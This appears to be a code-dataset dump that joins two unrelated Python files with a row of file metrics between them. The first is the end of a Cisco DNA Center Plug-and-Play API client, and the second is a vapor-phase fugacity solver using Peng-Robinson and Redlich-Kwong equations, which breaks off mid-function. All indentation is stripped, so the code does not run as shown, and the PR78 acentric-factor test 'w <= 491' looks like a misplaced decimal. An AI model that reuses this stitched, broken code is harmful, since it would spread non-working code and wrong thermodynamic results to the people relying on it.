"""Returns the list of workflows based on filter criteria. If a
limit is not specified, it will default to return 50
workflows. Pagination and sorting are also supported by
this endpoint.
Args:
limit(int): Limits number of results.
offset(int): Index of first result.
sort(basestring): Comma seperated lost of fields to sort
on.
sort_order(basestring): Sort Order Ascending (asc) or
Descending (des).
type(basestring): Workflow Type.
name(basestring): Workflow Name.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
list: JSON response. A list of MyDict objects.
Access the object's properties by using the dot notation
or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(limit, int)
check_type(offset, int)
check_type(sort, basestring)
check_type(sort_order, basestring)
check_type(type, basestring)
check_type(name, basestring)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
'limit':
limit,
'offset':
offset,
'sort':
sort,
'sortOrder':
sort_order,
'type':
type,
'name':
name,
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-workflow')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_aeb4dad04a99bbe3_v1_3_3', json_data)
def preview_config(self,
deviceId=None,
siteId=None,
type=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Triggers a preview for site-based Day 0 Configuration.
Args:
deviceId(string): SiteProvisionRequest's deviceId.
siteId(string): SiteProvisionRequest's siteId.
type(string): SiteProvisionRequest's type. Available
values are 'Default', 'AccessPoint',
'StackSwitch', 'Sensor' and
'MobilityExpress'.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'deviceId':
deviceId,
'siteId':
siteId,
'type':
type,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_cf9418234d9ab37e_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/site-config-'
+ 'preview')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_cf9418234d9ab37e_v1_3_3', json_data)
def get_device_by_id(self,
id,
headers=None,
**request_parameters):
"""Returns device details specified by device id.
Args:
id(basestring): id path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(id, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
'id': id,
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/${id}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_bab6c9e5440885cc_v1_3_3', json_data)
def claim_device(self,
configFileUrl=None,
configId=None,
deviceClaimList=None,
fileServiceId=None,
imageId=None,
imageUrl=None,
populateInventory=None,
projectId=None,
workflowId=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Claims one of more devices with specified workflow.
Args:
configFileUrl(string): ClaimDeviceRequest's
configFileUrl.
configId(string): ClaimDeviceRequest's configId.
deviceClaimList(list): ClaimDeviceRequest's
deviceClaimList (list of objects).
fileServiceId(string): ClaimDeviceRequest's
fileServiceId.
imageId(string): ClaimDeviceRequest's imageId.
imageUrl(string): ClaimDeviceRequest's imageUrl.
populateInventory(boolean): ClaimDeviceRequest's
populateInventory.
projectId(string): ClaimDeviceRequest's projectId.
workflowId(string): ClaimDeviceRequest's workflowId.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'configFileUrl':
configFileUrl,
'configId':
configId,
'deviceClaimList':
deviceClaimList,
'fileServiceId':
fileServiceId,
'imageId':
imageId,
'imageUrl':
imageUrl,
'populateInventory':
populateInventory,
'projectId':
projectId,
'workflowId':
workflowId,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_d8a619974a8a8c48_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/claim')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_d8a619974a8a8c48_v1_3_3', json_data)
def delete_device_by_id_from_pnp(self,
id,
headers=None,
**request_parameters):
"""Deletes specified device from PnP database.
Args:
id(basestring): id path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(id, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
'id': id,
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/${id}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=params)
return self._object_factory('bpm_cdab9b474899ae06_v1_3_3', json_data)
def get_device_list(self,
cm_state=None,
last_contact=None,
limit=None,
name=None,
offset=None,
onb_state=None,
pid=None,
project_id=None,
project_name=None,
serial_number=None,
smart_account_id=None,
sort=None,
sort_order=None,
source=None,
state=None,
virtual_account_id=None,
workflow_id=None,
workflow_name=None,
headers=None,
**request_parameters):
"""Returns list of devices based on filter crieteria. If a limit is
not specified, it will default to return 50 devices.
Pagination and sorting are also supported by this
endpoint.
Args:
limit(int): Limits number of results.
offset(int): Index of first result.
sort(basestring): Comma seperated list of fields to sort
on.
sort_order(basestring): Sort Order Ascending (asc) or
Descending (des).
serial_number(basestring): Device Serial Number.
state(basestring): Device State.
onb_state(basestring): Device Onboarding State.
cm_state(basestring): Device Connection Manager State.
name(basestring): Device Name.
pid(basestring): Device ProductId.
source(basestring): Device Source.
project_id(basestring): Device Project Id.
workflow_id(basestring): Device Workflow Id.
project_name(basestring): Device Project Name.
workflow_name(basestring): Device Workflow Name.
smart_account_id(basestring): Device Smart Account.
virtual_account_id(basestring): Device Virtual Account.
last_contact(bool): Device Has Contacted lastContact >
0.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(limit, int)
check_type(offset, int)
check_type(sort, basestring)
check_type(sort_order, basestring)
check_type(serial_number, basestring)
check_type(state, basestring)
check_type(onb_state, basestring)
check_type(cm_state, basestring)
check_type(name, basestring)
check_type(pid, basestring)
check_type(source, basestring)
check_type(project_id, basestring)
check_type(workflow_id, basestring)
check_type(project_name, basestring)
check_type(workflow_name, basestring)
check_type(smart_account_id, basestring)
check_type(virtual_account_id, basestring)
check_type(last_contact, bool)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
'limit':
limit,
'offset':
offset,
'sort':
sort,
'sortOrder':
sort_order,
'serialNumber':
serial_number,
'state':
state,
'onbState':
onb_state,
'cmState':
cm_state,
'name':
name,
'pid':
pid,
'source':
source,
'projectId':
project_id,
'workflowId':
workflow_id,
'projectName':
project_name,
'workflowName':
workflow_name,
'smartAccountId':
smart_account_id,
'virtualAccountId':
virtual_account_id,
'lastContact':
last_contact,
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_e6b3db8046c99654_v1_3_3', json_data)
def add_device(self,
_id=None,
deviceInfo=None,
runSummaryList=None,
systemResetWorkflow=None,
systemWorkflow=None,
tenantId=None,
version=None,
workflow=None,
workflowParameters=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Adds a device to the PnP database.
Args:
_id(string): Device's _id.
deviceInfo(object): Device's deviceInfo.
runSummaryList(list): Device's runSummaryList (list of
objects).
systemResetWorkflow(object): Device's
systemResetWorkflow.
systemWorkflow(object): Device's systemWorkflow.
tenantId(string): Device's tenantId.
version(number): Device's version.
workflow(object): Device's workflow.
workflowParameters(object): Device's workflowParameters.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'_id':
_id,
'deviceInfo':
deviceInfo,
'runSummaryList':
runSummaryList,
'systemResetWorkflow':
systemResetWorkflow,
'systemWorkflow':
systemWorkflow,
'tenantId':
tenantId,
'version':
version,
'workflow':
workflow,
'workflowParameters':
workflowParameters,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_f3b26b5544cabab9_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_f3b26b5544cabab9_v1_3_3', json_data)
def get_device_count(self,
cm_state=None,
last_contact=None,
name=None,
onb_state=None,
pid=None,
project_id=None,
project_name=None,
serial_number=None,
smart_account_id=None,
source=None,
state=None,
virtual_account_id=None,
workflow_id=None,
workflow_name=None,
headers=None,
**request_parameters):
"""Returns the device count based on filter criteria. This is
useful for pagination.
Args:
serial_number(basestring): Device Serial Number.
state(basestring): Device State.
onb_state(basestring): Device Onboarding State.
cm_state(basestring): Device Connection Manager State.
name(basestring): Device Name.
pid(basestring): Device ProductId.
source(basestring): Device Source.
project_id(basestring): Device Project Id.
workflow_id(basestring): Device Workflow Id.
project_name(basestring): Device Project Name.
workflow_name(basestring): Device Workflow Name.
smart_account_id(basestring): Device Smart Account.
virtual_account_id(basestring): Device Virtual Account.
last_contact(bool): Device Has Contacted lastContact >
0.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(serial_number, basestring)
check_type(state, basestring)
check_type(onb_state, basestring)
check_type(cm_state, basestring)
check_type(name, basestring)
check_type(pid, basestring)
check_type(source, basestring)
check_type(project_id, basestring)
check_type(workflow_id, basestring)
check_type(project_name, basestring)
check_type(workflow_name, basestring)
check_type(smart_account_id, basestring)
check_type(virtual_account_id, basestring)
check_type(last_contact, bool)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
'serialNumber':
serial_number,
'state':
state,
'onbState':
onb_state,
'cmState':
cm_state,
'name':
name,
'pid':
pid,
'source':
source,
'projectId':
project_id,
'workflowId':
workflow_id,
'projectName':
project_name,
'workflowName':
workflow_name,
'smartAccountId':
smart_account_id,
'virtualAccountId':
virtual_account_id,
'lastContact':
last_contact,
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/count')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_d9a1fa9c4068b23c_v1_3_3', json_data)
def get_device_history(self,
serial_number,
sort=None,
sort_order=None,
headers=None,
**request_parameters):
"""Returns history for a specific device. Serial number is a
required parameter.
Args:
serial_number(basestring): Device Serial Number.
sort(basestring): Comma seperated list of fields to sort
on.
sort_order(basestring): Sort Order Ascending (asc) or
Descending (des).
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(serial_number, basestring,
may_be_none=False)
check_type(sort, basestring)
check_type(sort_order, basestring)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
'serialNumber':
serial_number,
'sort':
sort,
'sortOrder':
sort_order,
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/history')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_f09319674049a7d4_v1_3_3', json_data)
| 38.185731 | 78 | 0.543181 | 9,484 | 98,481 | 5.436208 | 0.046394 | 0.024264 | 0.027698 | 0.020637 | 0.896328 | 0.893671 | 0.883197 | 0.871754 | 0.861454 | 0.852726 | 0 | 0.009811 | 0.389364 | 98,481 | 2,578 | 79 | 38.200543 | 0.847529 | 0.313644 | 0 | 0.861058 | 0 | 0 | 0.081329 | 0.040148 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018483 | false | 0 | 0.005099 | 0 | 0.042065 | 0.000637 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7c662b0152c5b35f775822bd429355bb1f262ff8 | 54,648 | py | Python | VLE/engine/methods/fug_methods.py | burakplt/Django-Chemical_Engineering- | ac84f450198abd865e7bd874d85d991f187efe7f | [
"MIT"
] | 2 | 2020-05-12T23:08:02.000Z | 2020-05-15T02:09:55.000Z | VLE/engine/methods/fug_methods.py | burakplt/Django-Chemical_Engineering- | ac84f450198abd865e7bd874d85d991f187efe7f | [
"MIT"
] | 4 | 2021-03-30T13:19:26.000Z | 2021-06-10T19:11:12.000Z | VLE/engine/methods/fug_methods.py | burakplt/Django-Chemical_Engineering- | ac84f450198abd865e7bd874d85d991f187efe7f | [
"MIT"
] | 1 | 2020-05-21T10:38:48.000Z | 2020-05-21T10:38:48.000Z | from math import exp, sqrt, log
from numpy import roots as np_roots
from ..chemsep_operation import EosInterface as dbcall
from chemeasy.settings import BASE_DIR
MODELS_URL = BASE_DIR+"/VLE/engine/Models/"
class PR76():
def phi_vapor(components, temp, pressure, fractions, kij_input = None, kij_tune=None):
"""PENG-ROBINSON equation of state solver for vapor phase.
:param components: Array that contains chemicals.
:param kij_input: Dict object {(i,j):kij, (i,k):kik....}
:param kij_tune: Tuning parameter for kij equation. Leave as None if kij_input given.
"""
cs = components # Components array
T = temp # get system temperature Kelvin
P = pressure #get system pressure Pascal
R = 8.314462 #Universal gas constant J/mol.K
y = fractions #Molar fractions array
#Calculate a(T) and b for each pure substance
def calculate_a(component,T):
"""Input a substance i.e cs[i]
Returns a value a = Pa.m^6/mol^2 """
w = float(component.AcentricityFactor) #acentric factor
Tc = float(component.CriticalTemperature)
Pc = float(component.CriticalPressure)
Tr = T/Tc #Reduced Temperature T is the global Temp value
kappa = 0.37464+1.54226*w-0.26992*w**2 #PR kappa value
c = 0.45724*(R**2)*(Tc**2)/Pc #PR multiply factor
alfaT = (1 + kappa*(1-Tr**0.5))**2 #PR alfa(T) function
aT = c*alfaT # a(T) Equation
return aT
def calculate_b(component):
"""Input a substance cs[i]
Returns b value b = m^3/mol """
Tc = float(component.CriticalTemperature)
Pc = float(component.CriticalPressure)
b = (0.07780*R*Tc)/Pc
return b
kijs = {}
if kij_input == None:
def calculate_kij(c1, c2, tune):
"""Calculate binary interaction parameter.
c1, c2 is the stream components, tune: 1.2 default
"""
Vc1 = float(c1.CriticalVolume) #Critical volume for substance 1
Vc2 = float(c2.CriticalVolume) #Critical volume for substance 2
k_ij = 1 - ( 2*sqrt( (Vc1**0.333)*(Vc2**0.333) )/(Vc1**0.333 + Vc2**0.333))**tune
return k_ij
if kij_tune != None:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
if i==j:
kijs[(i,j)] = 0
else:
if kij_tune.get((i,j),None)!=None:
kijs[(i,j)] = calculate_kij(cs[i],cs[j],kij_tune[(i,j)] )
else:
kijs[(i,j)] = kijs[(j,i)]
else:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
kijs[(i,j)] = calculate_kij(cs[i],cs[j], 1.2) #Default tune 1.2
else:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
if i==j:
kijs[(i,j)] = 0
else:
if kij_input.get((i,j),None):
if abs(kij_input.get((i,j))) < 0.3:
kijs[(i,j)] = kij_input[(i,j)]
else:
kijs[(i,j)] = 0
else:
kijs[(i,j)] = kijs[(j,i)]
def calculate_amix(y,T):
"""a(T) value for mixture"""
amix = 0 #Placeholder for a_mixture values
for i in range(0,len(cs)) :
for j in range(0,len(cs)):
kij = kijs[(i,j)] #kij value calculation
ai = calculate_a(cs[i],T) #ai value
aj = calculate_a(cs[j],T) #aj value
amix += y[i]*y[j]*sqrt(ai * aj)*(1-kij) #Update a_mix
return amix
def calculate_bmix(y):
""" b value for the mixture"""
bmix = 0
for i in range(0, len(cs)):
bmix += y[i]*calculate_b(cs[i])
return bmix
#amix = calculate_amix(y) # amix calculated value
#bmix = calculate_bmix(y) #bmix calculated value
def calculate_A(a,T):
"""Calculates A value for component or mixture. a or amix"""
A = a * P/(R**2)/(T**2) # A factor
return A
def calculate_B(b,T):
"""Calculates B value for a component or mixture."""
B = b * P/(R*T) # B factor
return B
def calculate_Z(A,B,T):
A = calculate_A(calculate_amix(y,T),T)
B = calculate_B(calculate_bmix(y),T)
coefficients = [1, B-1, A-2*B-3*B**2, B**2+2*B-A*B] # PR Z-equation
return max(np_roots(coefficients))# Return largest root for vapor phase calculation
amix = calculate_amix(y,T)
bmix = calculate_bmix(y)
A = calculate_A(calculate_amix(y,T),T)
B = calculate_B(calculate_bmix(y),T)
Z = calculate_Z(A,B,T)
# CALCULATE FUGACITY COEFFICIENT
#Z = calculate_Z(A,B)
def calculate_phi(i,T):
"""Vapor phase fugacity coefficient phi for a component.
:param comp: Input the substance/chemical"""
comp = cs[i]
a = calculate_a(comp,T)
b = calculate_b(comp)
ak = 0 # ak sum value for inside function
for k in range(0,len(cs)):
ak += y[k]* (1-kijs[(k,i)])* sqrt(calculate_a(cs[k],T)*calculate_a(comp,T))
phi = b*(Z-1)/bmix - log(Z-B) - A/(sqrt(8)*B)*(2*ak/amix - b/bmix)*log((Z+2.414*B)/(Z-0.414*B))
return exp(phi)
fugacity_coefficients = []
for i in range(0,len(cs)):
fugacity_coefficients.append( calculate_phi(i,T))
return fugacity_coefficients, kijs
class PR78 ():
def phi_vapor(components, temp, pressure, fractions, kij_input = None, kij_tune=None):
"""PENG-ROBINSON 78 equation of state solver for vapor phase.
:param components: Array that contains chemicals.
:param kij_input: Dict object {(i,j):kij, (i,k):kik....}
:param kij_tune: Tuning parameter for kij equation. Leave as None if kij_input given.
"""
cs = components # Components array
T = temp # get system temperature Kelvin
P = pressure #get system pressure Pascal
R = 8.314462 #Universal gas constant J/mol.K
y = fractions #Molar fractions array
#Calculate a(T) and b for each pure substance
def calculate_a(component,T):
"""Input a substance i.e cs[i]
Returns a value a = Pa.m^6/mol^2 """
w = float(component.AcentricityFactor) #acentric factor
Tc = float(component.CriticalTemperature)
Pc = float(component.CriticalPressure)
Tr = T/Tc #Reduced Temperature T is the global Temp value
if w <= 491:
kappa = 0.37464 + 1.54226*w - 0.26992*w**2 #PR kappa value
else:
kappa = 0.379642 + 1.48503*w - 0.164423*w**2 + 0.016666*w**3
c = 0.457235*(R**2)*(Tc**2)/Pc #PR multiply factor
alfaT = (1 + kappa*(1-Tr**0.5))**2 #PR alfa(T) function
aT = c*alfaT # a(T) Equation
return aT
def calculate_b(component):
"""Input a substance cs[i]
Returns b value b = m^3/mol """
Tc = float(component.CriticalTemperature)
Pc = float(component.CriticalPressure)
b = (0.077796*R*Tc)/Pc
return b
kijs = {}
if kij_input == None:
def calculate_kij(c1, c2, tune):
"""Calculate binary interaction parameter.
c1, c2 is the stream components, tune: 1.2 default
"""
Vc1 = float(c1.CriticalVolume) #Critical volume for substance 1
Vc2 = float(c2.CriticalVolume) #Critical volume for substance 2
k_ij = 1 - ( 2*sqrt( (Vc1**0.333)*(Vc2**0.333) )/(Vc1**0.333 + Vc2**0.333))**tune
return k_ij
if kij_tune != None:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
if i==j:
kijs[(i,j)] = 0
else:
if kij_tune.get((i,j),None)!=None:
kijs[(i,j)] = calculate_kij(cs[i],cs[j],kij_tune[(i,j)] )
else:
kijs[(i,j)] = kijs[(j,i)]
else:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
kijs[(i,j)] = calculate_kij(cs[i],cs[j], 1.2) #Default tune 1.2
else:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
if i==j:
kijs[(i,j)] = 0
else:
if kij_input.get((i,j),None):
if abs(kij_input.get((i,j))) < 0.3:
kijs[(i,j)] = kij_input[(i,j)]
else:
kijs[(i,j)] = 0
else:
kijs[(i,j)] = kijs[(j,i)]
def calculate_amix(y,T):
"""a(T) value for mixture"""
amix = 0 #Placeholder for a_mixture values
for i in range(0,len(cs)) :
for j in range(0,len(cs)):
kij = kijs[(i,j)] #kij value calculation
ai = calculate_a(cs[i],T) #ai value
aj = calculate_a(cs[j],T) #aj value
amix += y[i]*y[j]*sqrt(ai * aj)*(1-kij) #Update a_mix
return amix
def calculate_bmix(y):
""" b value for the mixture"""
bmix = 0
for i in range(0, len(cs)):
bmix += y[i]*calculate_b(cs[i])
return bmix
#amix = calculate_amix(y) # amix calculated value
#bmix = calculate_bmix(y) #bmix calculated value
def calculate_A(a,T):
"""Calculates A value for component or mixture. a or amix"""
A = a * P/(R**2)/(T**2) # A factor
return A
def calculate_B(b,T):
"""Calculates B value for a component or mixture."""
B = b * P/(R*T) # B factor
return B
def calculate_Z(A,B,T):
A = calculate_A(calculate_amix(y,T),T)
B = calculate_B(calculate_bmix(y),T)
coefficients = [1, B-1, A-2*B-3*B**2, B**2+2*B-A*B] # PR Z-equation
return max(np_roots(coefficients))# Return largest root for vapor phase calculation
amix = calculate_amix(y,T)
bmix = calculate_bmix(y)
A = calculate_A(calculate_amix(y,T),T)
B = calculate_B(calculate_bmix(y),T)
Z = calculate_Z(A,B,T)
# CALCULATE FUGACITY COEFFICIENT
#Z = calculate_Z(A,B)
def calculate_phi(i,T):
"""Vapor phase fugacity coefficient phi for a component.
:param comp: Input the substance/chemical"""
comp = cs[i]
a = calculate_a(comp,T)
b = calculate_b(comp)
ak = 0 # ak sum value for inside function
for k in range(0,len(cs)):
ak += y[k]* (1-kijs[(k,i)])* sqrt(calculate_a(cs[k],T)*calculate_a(comp,T))
phi = b*(Z-1)/bmix - log(Z-B) - A/(sqrt(8)*B)*(2*ak/amix - b/bmix)*log((Z+2.414*B)/(Z-0.414*B))
return exp(phi)
fugacity_coefficients = []
for i in range(0,len(cs)):
fugacity_coefficients.append( calculate_phi(i,T))
return fugacity_coefficients, kijs
class RK ():
def phi_vapor(components, temp, pressure, fractions, kij_input = None, kij_tune=None):
"""Redlich-Kwong equation of state solver for vapor phase.
:param components: Array that contains chemicals.
:param kij_input: Dict object {(i,j):kij, (i,k):kik....}
:param kij_tune: Tuning parameter for kij equation. Leave as None if kij_input given.
"""
cs = components # Components array
T = temp # get system temperature Kelvin
P = pressure #get system pressure Pascal
R = 8.314462 #Universal gas constant J/mol.K
y = fractions #Molar fractions array
#Calculate a(T) and b for each pure substance
def calculate_a(component):
"""Input a substance i.e cs[i]
Returns a value a = Pa.m^6/mol^2 """
Tc = float(component.CriticalTemperature)
Pc = float(component.CriticalPressure)
a = 0.427480* (R**2) * (Tc**2.5) /Pc
return a
def calculate_b(component):
"""Input a substance cs[i]
Returns b value b = m^3/mol """
Tc = float(component.CriticalTemperature)
Pc = float(component.CriticalPressure)
b = (0.086640*R*Tc)/Pc
return b
kijs = {}
if kij_input == None:
def calculate_kij(c1, c2, tune):
"""Calculate binary interaction parameter.
c1, c2 is the stream components, tune: 1.2 default
"""
Vc1 = float(c1.CriticalVolume) #Critical volume for substance 1
Vc2 = float(c2.CriticalVolume) #Critical volume for substance 2
k_ij = 1 - ( 2*sqrt( (Vc1**0.333)*(Vc2**0.333) )/(Vc1**0.333 + Vc2**0.333))**tune
return k_ij
if kij_tune != None:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
if i==j:
kijs[(i,j)] = 0
else:
if kij_tune.get((i,j),None)!=None:
kijs[(i,j)] = calculate_kij(cs[i],cs[j],kij_tune[(i,j)] )
else:
kijs[(i,j)] = kijs[(j,i)]
else:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
kijs[(i,j)] = calculate_kij(cs[i],cs[j], 1.2) #Default tune 1.2
else:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
if i==j:
kijs[(i,j)] = 0
else:
